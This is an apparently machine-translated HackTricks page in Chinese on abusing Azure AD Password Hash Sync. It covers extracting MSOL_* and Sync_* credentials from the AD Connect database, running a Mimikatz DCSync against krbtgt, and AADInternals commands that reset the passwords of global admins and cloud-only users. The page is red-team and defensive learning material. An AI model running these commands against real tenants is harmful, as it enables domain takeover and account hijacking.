Az - PHS - Password Hash Sync

学习与实践 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术： HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 分享黑客技巧。

基本信息

来自文档： 密码哈希同步 是实现混合身份的一种登录方法。Azure AD Connect 将用户密码的哈希值从本地 Active Directory 实例同步到基于云的 Azure AD 实例。

这是公司用来将本地 AD 与 Azure AD 同步的 最常见方法。

所有用户和 密码哈希的哈希 都从本地同步到 Azure AD。然而，明文密码 或原始哈希不会发送到 Azure AD。此外，内置安全组（如域管理员等）不会同步到 Azure AD。

哈希同步 每 2 分钟 发生一次。然而，默认情况下，密码过期 和帐户过期在 Azure AD 中 不同步。因此，本地密码过期（未更改）的用户可以继续使用旧密码 访问 Azure 资源。

当本地用户想要访问 Azure 资源时，身份验证在 Azure AD 上进行。

PHS 是 身份保护 和 AAD 域服务等功能所必需的。

侧向移动

当配置 PHS 时，一些 特权帐户 会自动创建：

帐户 MSOL_<installationID> 会在本地 AD 中自动创建。该帐户被赋予 目录同步帐户 角色（见文档），这意味着它在本地 AD 中具有 复制 (DCSync) 权限。
帐户 Sync_<name of on-prem ADConnect Server>_installationID 会在 Azure AD 中创建。该帐户可以 重置 Azure AD 中任何用户（同步或仅云）的密码。

这两个特权帐户的密码 存储在 SQL 服务器 上，该服务器上 安装了 Azure AD Connect。管理员可以提取这些特权用户的明文密码。数据库位于 C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf。

可以从其中一个表中提取配置，其中一个是加密的：

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

加密配置 使用 DPAPI 加密，并包含本地 AD 中 MSOL_* 用户的密码和 AzureAD 中 Sync_* 的密码。因此，妥协这些信息可以提升到 AD 和 AzureAD 的权限。

您可以在这次演讲中找到有关这些凭据如何存储和解密的完整概述。

查找 Azure AD Connect 服务器

如果 安装 Azure AD Connect 的服务器 加入了域（文档中推荐），可以使用以下方法找到它：

# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl

#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

滥用 MSOL_*

# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

您还可以使用 adconnectdump 来获取这些凭据。

滥用 Sync_*

妥协 Sync_* 账户可以 重置任何用户的密码（包括全局管理员）。

# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

也可以仅修改云用户的密码（即使这出乎意料）

# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

可以转储该用户的密码。

另一个选项是为服务主体分配特权权限，而Sync用户有权限这样做，然后访问该服务主体作为特权提升的方法。

无缝单点登录

可以使用PHS进行无缝单点登录，这对其他滥用行为是脆弱的。请查看：

Az - Seamless SSO

参考文献

支持HackTricks

查看订阅计划!
加入 💬 Discord群组或电报群组或在 Twitter 🐦 @hacktricks_live上关注我们。
通过向 HackTricks和HackTricks Cloud GitHub库提交PR来分享黑客技巧。

PreviousAz - Federation NextAz - PTA - Pass-through Authentication

Last updated 3 days ago